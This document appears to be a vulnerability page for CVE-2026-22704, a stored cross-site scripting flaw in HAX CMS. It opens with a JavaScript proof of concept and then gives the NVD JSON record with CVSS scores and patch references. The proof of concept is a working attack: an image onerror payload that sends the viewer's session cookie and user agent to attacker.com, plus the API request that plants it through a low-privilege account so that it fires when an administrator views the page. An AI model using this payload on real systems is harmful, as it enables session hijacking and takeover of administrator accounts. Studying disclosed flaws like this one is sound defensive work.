CVE-2026-22704

// CVE-2026-22704 Stored XSS PoC for HAX CMS // Attack requires low-privilege account, triggers when admin views the page // Malicious payload injection via content creation/edit API const maliciousPayload = ` <img src=x onerror=" // Steal session cookie fetch('https://attacker.com/steal?cookie=' + document.cookie); // Hijack session fetch('https://attacker.com/api/session-hijack', { method: 'POST', body: JSON.stringify({ session: document.cookie, userAgent: navigator.userAgent }) }); "> `; // Example: POST request to create content with XSS payload fetch('/api/content/create', { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer [low-privilege-token]' }, body: JSON.stringify({ title: 'Malicious Content', body: maliciousPayload, format: 'html' }) }); // When admin views: <img src=x onerror="[malicious JS]"> executes // Results in: account takeover, session hijacking, data theft

{"cve": {"id": "CVE-2026-22704", "sourceIdentifier": "[email protected]", "published": "2026-01-10T07:16:03.200", "lastModified": "2026-02-05T20:59:55.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HAX CMS helps manage microsite universe with PHP or NodeJs backends. In versions 11.0.6 to before 25.0.0, HAX CMS is vulnerable to stored XSS, which could lead to account takeover. This issue has been patched in version 25.0.0."}, {"lang": "es", "value": "HAX CMS ayuda a gestionar el universo de micrositios con backends de PHP o NodeJs. En las versiones 11.0.6 hasta antes de la 25.0.0, HAX CMS es vulnerable a XSS almacenado, lo que podría llevar a la toma de control de cuentas. Este problema ha sido parcheado en la versión 25.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:psu:haxcms-nodejs:11.0.6:*:*:*:*:node.js:*:*", "matchCriteriaId": "EF62173E-0BA7-4937-BBCF-162BA9F775FD"}]}]}], "references": [{"url": "https://github.com/haxtheweb/haxcms-nodejs/commit/317a8ae29f88be389f7cfeffaef416957122d97e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v25.0.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/haxtheweb/issues/security/advisories/GHSA-3fm2-xfq7-7778", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}